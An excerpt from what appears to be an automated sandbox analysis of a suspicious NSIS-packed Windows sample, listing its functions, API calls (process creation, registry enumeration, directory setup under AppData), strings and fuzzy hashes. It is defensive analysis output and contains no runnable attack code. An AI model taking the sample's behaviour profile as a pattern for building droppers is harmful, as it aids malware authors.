        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
        • String ID:
        • API String ID: 3585118688-0
        • Opcode ID: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
        • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
        • Opcode Fuzzy Hash: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
        • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
        Function 00403969 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 705 403969-403978 706 403984-40398c 705->706 707 40397a-40397d CloseHandle 705->707 708 403998-4039a4 call 4039c6 call 405a03 706->708 709 40398e-403991 CloseHandle 706->709 707->706 713 4039a9-4039aa 708->713 709->708
        APIs
        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F
        Strings
        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
        • C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\, xrefs: 0040399F
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\
        • API String ID: 2962429428-445889443
        • Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
        • Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
        • Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
        • Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9
        Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0,00000000), ref: 00405C7F
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
          • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\afdragsordning,?,00000000,000000F0), ref: 0040164D
        Strings
        • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 00401640
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharNext$Directory$AttributesCreateCurrentFile
        • String ID: C:\Users\user\AppData\Roaming\afdragsordning
        • API String ID: 1892508949-4024115843
        • Opcode ID: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
        • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
        • Opcode Fuzzy Hash: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
        • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
        Function 00405CCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
          • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0,00000000), ref: 00405C7F
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
          • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
        • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0,00000000), ref: 00405D27
        • GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0), ref: 00405D37
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharNext$AttributesFilelstrcpynlstrlen
        • String ID: 0_B
        • API String ID: 3248276644-2128305573
        • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
        • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
        • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
        • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
        Function 004058F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
        Download Yara Rule
        APIs
        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
        • CloseHandle.KERNEL32(?), ref: 00405928
        Strings
        • Error launching installer, xrefs: 00405905
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseCreateHandleProcess
        • String ID: Error launching installer
        • API String ID: 3712363035-66219284
        • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
        • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
        • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
        • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
        Function 00406D0F Relevance: 5.2, APIs: 4, Instructions: 236COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
        • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
        • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
        • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
        Function 00406F10 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
        • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
        • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
        • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
        Function 00406C26 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
        • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
        • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
        • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
        Function 0040672B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
        • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
        • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
        • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
        Function 00406B79 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
        • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
        • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
        • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
        Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
        • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
        • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
        • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
        Function 00406BE3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
        • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
        • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
        • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
        Function 00403283 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
        Download Yara Rule
        APIs
        • GetTickCount.KERNEL32 ref: 00403297
          • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
        • SetFilePointer.KERNELBASE(00D05A7D,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FilePointer$CountTick
        • String ID:
        • API String ID: 1092082344-0
        • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
        • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
        • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
        • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
        Function 00402511 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
        • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
